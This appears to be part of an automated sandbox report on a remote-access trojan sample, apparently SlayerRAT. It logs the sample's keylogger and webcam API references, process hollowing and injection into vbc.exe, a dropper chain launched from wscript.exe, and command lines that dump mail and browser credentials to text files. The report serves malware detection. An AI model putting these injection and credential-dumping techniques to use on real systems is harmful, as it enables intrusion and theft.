Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 2.2.pgr.exe.80000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 2.0.pgr.exe.80000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'

Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.602209717.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp, Tmp.exe.0.dr	Binary or memory string: Shell_TrayWnd
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp	Binary or memory string: Program Manager\|9kr
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp	Binary or memory string: Shell_traywndnlp
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmp	Binary or memory string: Shell_traywndG
Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp, servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmp	Binary or memory string: Shell_traywnd8
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp	Binary or memory string: Program Manager<
Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, Tmp.exe.0.dr	Binary or memory string: Shell_traywnd

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
